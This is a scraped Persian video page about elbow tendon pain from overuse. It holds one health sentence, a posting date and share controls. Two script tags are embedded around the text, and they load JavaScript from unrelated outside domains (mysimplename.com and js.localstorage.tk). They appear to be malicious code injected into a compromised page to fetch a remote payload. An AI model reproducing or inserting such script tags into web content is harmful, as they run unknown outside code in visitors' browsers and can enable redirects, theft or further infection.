از شر آرنج درد رها شوید


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>استفاده بیش ازحد و فشارهای مکرر بر روی تاندون های اطراف مفصل آرنج میتواند باعث از بین رفتن این بافت ها مخصوصا درناحیه ای که تاندون ها به استخوان ها متصل شده است بشوند.
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1396/7/19 ساعت 13:35 2017-10-11 12:35:30
klipix_com
توسط klipix_com


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر